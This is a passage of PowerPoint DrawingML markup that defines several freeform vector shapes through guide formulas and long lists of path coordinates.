                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="115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9" name="Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2855913" y="5280025"/>
                <a:ext cx="206375" cy="190500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 574"/>
                  <a:gd name="T1" fmla="*/ 251 h 531"/>
                  <a:gd name="T2" fmla="*/ 153 w 574"/>
                  <a:gd name="T3" fmla="*/ 283 h 531"/>
                  <a:gd name="T4" fmla="*/ 126 w 574"/>
                  <a:gd name="T5" fmla="*/ 314 h 531"/>
                  <a:gd name="T6" fmla="*/ 116 w 574"/>
                  <a:gd name="T7" fmla="*/ 351 h 531"/>
                  <a:gd name="T8" fmla="*/ 121 w 574"/>
                  <a:gd name="T9" fmla="*/ 367 h 531"/>
                  <a:gd name="T10" fmla="*/ 126 w 574"/>
                  <a:gd name="T11" fmla="*/ 383 h 531"/>
                  <a:gd name="T12" fmla="*/ 153 w 574"/>
                  <a:gd name="T13" fmla="*/ 404 h 531"/>
                  <a:gd name="T14" fmla="*/ 179 w 574"/>
                  <a:gd name="T15" fmla="*/ 409 h 531"/>
                  <a:gd name="T16" fmla="*/ 216 w 574"/>
                  <a:gd name="T17" fmla="*/ 404 h 531"/>
                  <a:gd name="T18" fmla="*/ 336 w 574"/>
                  <a:gd name="T19" fmla="*/ 482 h 531"/>
                  <a:gd name="T20" fmla="*/ 294 w 574"/>
                  <a:gd name="T21" fmla="*/ 508 h 531"/>
                  <a:gd name="T22" fmla="*/ 221 w 574"/>
                  <a:gd name="T23" fmla="*/ 530 h 531"/>
                  <a:gd name="T24" fmla="*/ 184 w 574"/>
                  <a:gd name="T25" fmla="*/ 530 h 531"/>
                  <a:gd name="T26" fmla="*/ 116 w 574"/>
                  <a:gd name="T27" fmla="*/ 503 h 531"/>
                  <a:gd name="T28" fmla="*/ 53 w 574"/>
                  <a:gd name="T29" fmla="*/ 440 h 531"/>
                  <a:gd name="T30" fmla="*/ 32 w 574"/>
                  <a:gd name="T31" fmla="*/ 414 h 531"/>
                  <a:gd name="T32" fmla="*/ 6 w 574"/>
                  <a:gd name="T33" fmla="*/ 356 h 531"/>
                  <a:gd name="T34" fmla="*/ 0 w 574"/>
                  <a:gd name="T35" fmla="*/ 330 h 531"/>
                  <a:gd name="T36" fmla="*/ 6 w 574"/>
                  <a:gd name="T37" fmla="*/ 283 h 531"/>
                  <a:gd name="T38" fmla="*/ 16 w 574"/>
                  <a:gd name="T39" fmla="*/ 236 h 531"/>
                  <a:gd name="T40" fmla="*/ 42 w 574"/>
                  <a:gd name="T41" fmla="*/ 194 h 531"/>
                  <a:gd name="T42" fmla="*/ 79 w 574"/>
                  <a:gd name="T43" fmla="*/ 157 h 531"/>
                  <a:gd name="T44" fmla="*/ 163 w 574"/>
                  <a:gd name="T45" fmla="*/ 89 h 531"/>
                  <a:gd name="T46" fmla="*/ 253 w 574"/>
                  <a:gd name="T47" fmla="*/ 31 h 531"/>
                  <a:gd name="T48" fmla="*/ 300 w 574"/>
                  <a:gd name="T49" fmla="*/ 10 h 531"/>
                  <a:gd name="T50" fmla="*/ 347 w 574"/>
                  <a:gd name="T51" fmla="*/ 0 h 531"/>
                  <a:gd name="T52" fmla="*/ 394 w 574"/>
                  <a:gd name="T53" fmla="*/ 4 h 531"/>
                  <a:gd name="T54" fmla="*/ 436 w 574"/>
                  <a:gd name="T55" fmla="*/ 15 h 531"/>
                  <a:gd name="T56" fmla="*/ 457 w 574"/>
                  <a:gd name="T57" fmla="*/ 31 h 531"/>
                  <a:gd name="T58" fmla="*/ 504 w 574"/>
                  <a:gd name="T59" fmla="*/ 67 h 531"/>
                  <a:gd name="T60" fmla="*/ 525 w 574"/>
                  <a:gd name="T61" fmla="*/ 94 h 531"/>
                  <a:gd name="T62" fmla="*/ 567 w 574"/>
                  <a:gd name="T63" fmla="*/ 167 h 531"/>
                  <a:gd name="T64" fmla="*/ 573 w 574"/>
                  <a:gd name="T65" fmla="*/ 188 h 531"/>
                  <a:gd name="T66" fmla="*/ 562 w 574"/>
                  <a:gd name="T67" fmla="*/ 272 h 531"/>
                  <a:gd name="T68" fmla="*/ 541 w 574"/>
                  <a:gd name="T69" fmla="*/ 314 h 531"/>
                  <a:gd name="T70" fmla="*/ 510 w 574"/>
                  <a:gd name="T71" fmla="*/ 351 h 531"/>
                  <a:gd name="T72" fmla="*/ 420 w 574"/>
                  <a:gd name="T73" fmla="*/ 430 h 531"/>
                  <a:gd name="T74" fmla="*/ 226 w 574"/>
                  <a:gd name="T75" fmla="*/ 220 h 531"/>
                  <a:gd name="T76" fmla="*/ 426 w 574"/>
                  <a:gd name="T77" fmla="*/ 251 h 531"/>
                  <a:gd name="T78" fmla="*/ 441 w 574"/>
                  <a:gd name="T79" fmla="*/ 236 h 531"/>
                  <a:gd name="T80" fmla="*/ 452 w 574"/>
                  <a:gd name="T81" fmla="*/ 214 h 531"/>
                  <a:gd name="T82" fmla="*/ 457 w 574"/>
                  <a:gd name="T83" fmla="*/ 183 h 531"/>
                  <a:gd name="T84" fmla="*/ 457 w 574"/>
                  <a:gd name="T85" fmla="*/ 167 h 531"/>
                  <a:gd name="T86" fmla="*/ 447 w 574"/>
                  <a:gd name="T87" fmla="*/ 151 h 531"/>
                  <a:gd name="T88" fmla="*/ 415 w 574"/>
                  <a:gd name="T89" fmla="*/ 125 h 531"/>
                  <a:gd name="T90" fmla="*/ 400 w 574"/>
                  <a:gd name="T91" fmla="*/ 125 h 531"/>
                  <a:gd name="T92" fmla="*/ 383 w 574"/>
                  <a:gd name="T93" fmla="*/ 125 h 531"/>
                  <a:gd name="T94" fmla="*/ 347 w 574"/>
                  <a:gd name="T95" fmla="*/ 136 h 531"/>
                  <a:gd name="T96" fmla="*/ 294 w 574"/>
                  <a:gd name="T97" fmla="*/ 173 h 531"/>
                  <a:gd name="T98" fmla="*/ 383 w 574"/>
                  <a:gd name="T99" fmla="*/ 288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74" h="531">
                    <a:moveTo>
                      <a:pt x="189" y="251"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="251"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="426" y="251"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="426" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="251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0" name="Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2947988" y="5394325"/>
                <a:ext cx="225425" cy="171450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 515 w 626"/>
                  <a:gd name="T1" fmla="*/ 104 h 478"/>
                  <a:gd name="T2" fmla="*/ 457 w 626"/>
                  <a:gd name="T3" fmla="*/ 152 h 478"/>
                  <a:gd name="T4" fmla="*/ 457 w 626"/>
                  <a:gd name="T5" fmla="*/ 157 h 478"/>
                  <a:gd name="T6" fmla="*/ 457 w 626"/>
                  <a:gd name="T7" fmla="*/ 157 h 478"/>
                  <a:gd name="T8" fmla="*/ 499 w 626"/>
                  <a:gd name="T9" fmla="*/ 152 h 478"/>
                  <a:gd name="T10" fmla="*/ 541 w 626"/>
                  <a:gd name="T11" fmla="*/ 152 h 478"/>
                  <a:gd name="T12" fmla="*/ 541 w 626"/>
                  <a:gd name="T13" fmla="*/ 152 h 478"/>
                  <a:gd name="T14" fmla="*/ 562 w 626"/>
                  <a:gd name="T15" fmla="*/ 157 h 478"/>
                  <a:gd name="T16" fmla="*/ 578 w 626"/>
                  <a:gd name="T17" fmla="*/ 168 h 478"/>
                  <a:gd name="T18" fmla="*/ 594 w 626"/>
                  <a:gd name="T19" fmla="*/ 178 h 478"/>
                  <a:gd name="T20" fmla="*/ 610 w 626"/>
                  <a:gd name="T21" fmla="*/ 194 h 478"/>
                  <a:gd name="T22" fmla="*/ 610 w 626"/>
                  <a:gd name="T23" fmla="*/ 194 h 478"/>
                  <a:gd name="T24" fmla="*/ 620 w 626"/>
                  <a:gd name="T25" fmla="*/ 204 h 478"/>
                  <a:gd name="T26" fmla="*/ 620 w 626"/>
                  <a:gd name="T27" fmla="*/ 204 h 478"/>
                  <a:gd name="T28" fmla="*/ 625 w 626"/>
                  <a:gd name="T29" fmla="*/ 215 h 478"/>
                  <a:gd name="T30" fmla="*/ 520 w 626"/>
                  <a:gd name="T31" fmla="*/ 304 h 478"/>
                  <a:gd name="T32" fmla="*/ 520 w 626"/>
                  <a:gd name="T33" fmla="*/ 304 h 478"/>
                  <a:gd name="T34" fmla="*/ 510 w 626"/>
                  <a:gd name="T35" fmla="*/ 288 h 478"/>
                  <a:gd name="T36" fmla="*/ 510 w 626"/>
                  <a:gd name="T37" fmla="*/ 288 h 478"/>
                  <a:gd name="T38" fmla="*/ 494 w 626"/>
                  <a:gd name="T39" fmla="*/ 272 h 478"/>
                  <a:gd name="T40" fmla="*/ 494 w 626"/>
                  <a:gd name="T41" fmla="*/ 272 h 478"/>
                  <a:gd name="T42" fmla="*/ 467 w 626"/>
                  <a:gd name="T43" fmla="*/ 246 h 478"/>
                  <a:gd name="T44" fmla="*/ 467 w 626"/>
                  <a:gd name="T45" fmla="*/ 246 h 478"/>
                  <a:gd name="T46" fmla="*/ 447 w 626"/>
                  <a:gd name="T47" fmla="*/ 236 h 478"/>
                  <a:gd name="T48" fmla="*/ 431 w 626"/>
                  <a:gd name="T49" fmla="*/ 231 h 478"/>
                  <a:gd name="T50" fmla="*/ 431 w 626"/>
                  <a:gd name="T51" fmla="*/ 231 h 478"/>
                  <a:gd name="T52" fmla="*/ 410 w 626"/>
                  <a:gd name="T53" fmla="*/ 231 h 478"/>
                  <a:gd name="T54" fmla="*/ 389 w 626"/>
                  <a:gd name="T55" fmla="*/ 231 h 478"/>
                  <a:gd name="T56" fmla="*/ 389 w 626"/>
                  <a:gd name="T57" fmla="*/ 231 h 478"/>
                  <a:gd name="T58" fmla="*/ 368 w 626"/>
                  <a:gd name="T59" fmla="*/ 241 h 478"/>
                  <a:gd name="T60" fmla="*/ 347 w 626"/>
                  <a:gd name="T61" fmla="*/ 257 h 478"/>
                  <a:gd name="T62" fmla="*/ 95 w 626"/>
                  <a:gd name="T63" fmla="*/ 477 h 478"/>
                  <a:gd name="T64" fmla="*/ 0 w 626"/>
                  <a:gd name="T65" fmla="*/ 367 h 478"/>
                  <a:gd name="T66" fmla="*/ 426 w 626"/>
                  <a:gd name="T67" fmla="*/ 0 h 478"/>
                  <a:gd name="T68" fmla="*/ 515 w 626"/>
                  <a:gd name="T69" fmla="*/ 104 h 4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26" h="478">
                    <a:moveTo>
                      <a:pt x="515" y="104"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="457" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="104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1" name="Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3041650" y="5505450"/>
                <a:ext cx="215900" cy="227013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 263 w 599"/>
                  <a:gd name="T1" fmla="*/ 53 h 631"/>
                  <a:gd name="T2" fmla="*/ 331 w 599"/>
                  <a:gd name="T3" fmla="*/ 5 h 631"/>
                  <a:gd name="T4" fmla="*/ 362 w 599"/>
                  <a:gd name="T5" fmla="*/ 0 h 631"/>
                  <a:gd name="T6" fmla="*/ 399 w 599"/>
                  <a:gd name="T7" fmla="*/ 0 h 631"/>
                  <a:gd name="T8" fmla="*/ 462 w 599"/>
                  <a:gd name="T9" fmla="*/ 26 h 631"/>
                  <a:gd name="T10" fmla="*/ 494 w 599"/>
                  <a:gd name="T11" fmla="*/ 48 h 631"/>
                  <a:gd name="T12" fmla="*/ 520 w 599"/>
                  <a:gd name="T13" fmla="*/ 74 h 631"/>
                  <a:gd name="T14" fmla="*/ 583 w 599"/>
                  <a:gd name="T15" fmla="*/ 158 h 631"/>
                  <a:gd name="T16" fmla="*/ 598 w 599"/>
                  <a:gd name="T17" fmla="*/ 195 h 631"/>
                  <a:gd name="T18" fmla="*/ 598 w 599"/>
                  <a:gd name="T19" fmla="*/ 231 h 631"/>
                  <a:gd name="T20" fmla="*/ 578 w 599"/>
                  <a:gd name="T21" fmla="*/ 289 h 631"/>
                  <a:gd name="T22" fmla="*/ 562 w 599"/>
                  <a:gd name="T23" fmla="*/ 315 h 631"/>
                  <a:gd name="T24" fmla="*/ 321 w 599"/>
                  <a:gd name="T25" fmla="*/ 546 h 631"/>
                  <a:gd name="T26" fmla="*/ 278 w 599"/>
                  <a:gd name="T27" fmla="*/ 588 h 631"/>
                  <a:gd name="T28" fmla="*/ 257 w 599"/>
                  <a:gd name="T29" fmla="*/ 630 h 631"/>
                  <a:gd name="T30" fmla="*/ 163 w 599"/>
                  <a:gd name="T31" fmla="*/ 530 h 631"/>
                  <a:gd name="T32" fmla="*/ 174 w 599"/>
                  <a:gd name="T33" fmla="*/ 504 h 631"/>
                  <a:gd name="T34" fmla="*/ 189 w 599"/>
                  <a:gd name="T35" fmla="*/ 478 h 631"/>
                  <a:gd name="T36" fmla="*/ 147 w 599"/>
                  <a:gd name="T37" fmla="*/ 483 h 631"/>
                  <a:gd name="T38" fmla="*/ 110 w 599"/>
                  <a:gd name="T39" fmla="*/ 473 h 631"/>
                  <a:gd name="T40" fmla="*/ 74 w 599"/>
                  <a:gd name="T41" fmla="*/ 452 h 631"/>
                  <a:gd name="T42" fmla="*/ 42 w 599"/>
                  <a:gd name="T43" fmla="*/ 420 h 631"/>
                  <a:gd name="T44" fmla="*/ 5 w 599"/>
                  <a:gd name="T45" fmla="*/ 368 h 631"/>
                  <a:gd name="T46" fmla="*/ 0 w 599"/>
                  <a:gd name="T47" fmla="*/ 336 h 631"/>
                  <a:gd name="T48" fmla="*/ 5 w 599"/>
                  <a:gd name="T49" fmla="*/ 310 h 631"/>
                  <a:gd name="T50" fmla="*/ 27 w 599"/>
                  <a:gd name="T51" fmla="*/ 257 h 631"/>
                  <a:gd name="T52" fmla="*/ 42 w 599"/>
                  <a:gd name="T53" fmla="*/ 236 h 631"/>
                  <a:gd name="T54" fmla="*/ 63 w 599"/>
                  <a:gd name="T55" fmla="*/ 216 h 631"/>
                  <a:gd name="T56" fmla="*/ 116 w 599"/>
                  <a:gd name="T57" fmla="*/ 173 h 631"/>
                  <a:gd name="T58" fmla="*/ 142 w 599"/>
                  <a:gd name="T59" fmla="*/ 163 h 631"/>
                  <a:gd name="T60" fmla="*/ 168 w 599"/>
                  <a:gd name="T61" fmla="*/ 158 h 631"/>
                  <a:gd name="T62" fmla="*/ 226 w 599"/>
                  <a:gd name="T63" fmla="*/ 168 h 631"/>
                  <a:gd name="T64" fmla="*/ 252 w 599"/>
                  <a:gd name="T65" fmla="*/ 179 h 631"/>
                  <a:gd name="T66" fmla="*/ 357 w 599"/>
                  <a:gd name="T67" fmla="*/ 242 h 631"/>
                  <a:gd name="T68" fmla="*/ 383 w 599"/>
                  <a:gd name="T69" fmla="*/ 252 h 631"/>
                  <a:gd name="T70" fmla="*/ 404 w 599"/>
                  <a:gd name="T71" fmla="*/ 257 h 631"/>
                  <a:gd name="T72" fmla="*/ 446 w 599"/>
                  <a:gd name="T73" fmla="*/ 236 h 631"/>
                  <a:gd name="T74" fmla="*/ 462 w 599"/>
                  <a:gd name="T75" fmla="*/ 216 h 631"/>
                  <a:gd name="T76" fmla="*/ 472 w 599"/>
                  <a:gd name="T77" fmla="*/ 195 h 631"/>
                  <a:gd name="T78" fmla="*/ 467 w 599"/>
                  <a:gd name="T79" fmla="*/ 168 h 631"/>
                  <a:gd name="T80" fmla="*/ 446 w 599"/>
                  <a:gd name="T81" fmla="*/ 142 h 631"/>
                  <a:gd name="T82" fmla="*/ 415 w 599"/>
                  <a:gd name="T83" fmla="*/ 121 h 631"/>
                  <a:gd name="T84" fmla="*/ 399 w 599"/>
                  <a:gd name="T85" fmla="*/ 121 h 631"/>
                  <a:gd name="T86" fmla="*/ 352 w 599"/>
                  <a:gd name="T87" fmla="*/ 142 h 631"/>
                  <a:gd name="T88" fmla="*/ 252 w 599"/>
                  <a:gd name="T89" fmla="*/ 63 h 631"/>
                  <a:gd name="T90" fmla="*/ 315 w 599"/>
                  <a:gd name="T91" fmla="*/ 315 h 631"/>
                  <a:gd name="T92" fmla="*/ 289 w 599"/>
                  <a:gd name="T93" fmla="*/ 299 h 631"/>
                  <a:gd name="T94" fmla="*/ 252 w 599"/>
                  <a:gd name="T95" fmla="*/ 284 h 631"/>
                  <a:gd name="T96" fmla="*/ 226 w 599"/>
                  <a:gd name="T97" fmla="*/ 279 h 631"/>
                  <a:gd name="T98" fmla="*/ 168 w 599"/>
                  <a:gd name="T99" fmla="*/ 305 h 631"/>
                  <a:gd name="T100" fmla="*/ 147 w 599"/>
                  <a:gd name="T101" fmla="*/ 326 h 631"/>
                  <a:gd name="T102" fmla="*/ 137 w 599"/>
                  <a:gd name="T103" fmla="*/ 352 h 631"/>
                  <a:gd name="T104" fmla="*/ 137 w 599"/>
                  <a:gd name="T105" fmla="*/ 373 h 631"/>
                  <a:gd name="T106" fmla="*/ 147 w 599"/>
                  <a:gd name="T107" fmla="*/ 399 h 631"/>
                  <a:gd name="T108" fmla="*/ 174 w 599"/>
                  <a:gd name="T109" fmla="*/ 415 h 631"/>
                  <a:gd name="T110" fmla="*/ 189 w 599"/>
                  <a:gd name="T111" fmla="*/ 420 h 631"/>
                  <a:gd name="T112" fmla="*/ 204 w 599"/>
                  <a:gd name="T113" fmla="*/ 426 h 631"/>
                  <a:gd name="T114" fmla="*/ 236 w 599"/>
                  <a:gd name="T115" fmla="*/ 426 h 631"/>
                  <a:gd name="T116" fmla="*/ 257 w 599"/>
                  <a:gd name="T117" fmla="*/ 415 h 631"/>
                  <a:gd name="T118" fmla="*/ 352 w 599"/>
                  <a:gd name="T119" fmla="*/ 326 h 631"/>
                  <a:gd name="T120" fmla="*/ 315 w 599"/>
                  <a:gd name="T121" fmla="*/ 315 h 6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599" h="631">
                    <a:moveTo>
                      <a:pt x="263" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
